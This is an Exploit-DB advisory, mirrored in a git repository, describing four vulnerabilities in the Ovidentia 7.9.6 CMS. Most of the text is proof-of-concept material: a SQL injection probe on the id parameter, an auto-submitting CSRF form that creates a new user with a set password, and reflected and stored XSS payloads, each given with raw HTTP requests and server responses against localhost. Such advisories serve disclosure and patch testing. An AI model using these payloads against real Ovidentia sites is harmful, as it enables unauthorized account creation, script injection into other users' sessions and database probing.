bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/30107.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

171 lines
No EOL
5.6 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

###########################################################
[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities
[~] Author: sajith
[~] version: Ovidentia 7.9.6
[~]Vendor Homepage: http://www.ovidentia.org/
[~] vulnerable app link:http://www.ovidentia.org/telecharger
###########################################################
[1]SQL injection vulnerability
Log into admin panel and access delegate functionality > managing
administrators where &id parameter (shown below link) is vulnerable to sql
injection
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1
POC by sajith shetty:
request:
GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=
response:
style="cursor: pointer"
onclick="s=document.getElementById('babParam_1_5_0');
s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div
style="display: none; background-color: #EEEECC"
id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)
<i>called at</i>
[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute
query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>
<p><b>Database Error: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ''' at line 1</b></p>
<p>This script cannot continue, terminating.
[2]CSRF vulnerability
log into the admin portal and access the create user functionality
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=
using csrf vulnerability it was possible to add new user.
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php"
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="user[sendpwd]" value="0" />
<input type="hidden" name="user[password1]" value="P@ssw0rd1" />
<input type="hidden" name="user[notifyuser]" value="0" />
<input type="hidden" name="grp" value="" />
<input type="hidden" name="idx" value="Create" />
<input type="hidden" name="user[password2]" value="P@ssw0rd1" />
<input type="hidden" name="user[givenname]" value="POC" />
<input type="hidden" name="pos" value="A" />
<input type="hidden" name="widget_filepicker_job_uid[]"
value="52a35b7fac6c9" />
<input type="hidden" name="user[email]" value="poctester@xyz.com" />
<input type="hidden" name="user[nickname]" value="1234" />
<input type="hidden" name="user[sn]" value="test" />
<input type="hidden" name="tg" value="users" />
<input type="hidden" name="user[mn]" value="tester" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
[3]Reflected XSS
http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x
onerror=prompt(1);>
request:
GET
/cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
response:
<div id="ovidentia_headbottomright">
<div>
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :
http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x
onerror=prompt(1);>" title="Home"><img
src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"
/></a> 
<!-- Script OVML: show the list of the buttons of quick accesses to
functions by leaning on entries available in user section -->
[4]Stored xss
log into the admin portal and access mail functionlity and create new
domain using link below
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
here Name & Description field is vulnerable to stored XSS .payload:"><img
src=x onerror=prompt(1);>
request:
POST /cms/ovidentia-7-9-6/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen
response:
<td>Registrierte User</td>
</tr>
<tr class="BabSiteAdminFontBackground">
<td>
<a href="
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img
src=x onerror=prompt(111);></a>
</td>
<td>"><img src=x onerror=prompt(222);></td>
<td>Registrierte User</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</div>
Reference in a new issue View git blame Copy permalink